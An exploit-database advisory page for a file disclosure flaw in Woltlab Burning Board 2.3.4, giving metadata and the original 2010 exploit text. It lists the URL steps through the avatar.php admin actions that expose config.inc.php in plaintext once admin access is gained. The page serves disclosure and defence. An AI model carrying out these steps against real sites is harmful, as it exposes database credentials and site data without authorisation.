Woltlab Burning Board 2.3.4 File Disclosure Vulnerability

vendor:

Burning Board

by:

SFX

7,5

CVSS

HIGH

File Disclosure

200

CWE

Product Name: Burning Board

Affected Version From: 2.3.4

Affected Version To: 2.3.4

Patch Exists: NO

Related CWE: N/A

CPE: a:woltlab:burning_board:2.3.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2010

Woltlab Burning Board 2.3.4 File Disclosure Vulnerability

After using the exploit to get the admin account, the user can go to http://lolcathost/wbb/acp/avatar.php?action=readfolder and import acp/lib. Then, they can download a backup from http://lolcathost/wbb/acp/avatar.php?action=backup. After that, they can go to http://lolcathost/wbb/acp/avatar.php?action=view and search for config.inc.php. After they know the name (for example avatar-17.php), they can go to the zip archive and open avatar-17.php to get the config.inc.php in plaintext.

Mitigation:

Ensure that the web application is configured to prevent unauthorized access to sensitive files.

Source

Exploit-DB raw data:

# Exploit Title: Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
# Date: 2010-11-12
# Author: SFX
# Version: 2.3.4
# CVE : N/A

After you've used the Exploit to get the admin account:

goto: http://lolcathost/wbb/acp/avatar.php?action=readfolder

import: acp/lib

download a backup: http://lolcathost/wbb/acp/avatar.php?action=backup

goto: http://lolcathost/wbb/acp/avatar.php?action=view

search for: config.inc.php

after you know the name (for example avatar-17.php), goto the zip archive
and open avatar-17.php

that's the config.inc.php in plaintext

tested under 2.3.4, maybe other versions work too

Greetz to:
free-hack.com, back2hack.cc, hackerking, Omegavirus, BlackBerry, fred777,
Red Tiger, Samsa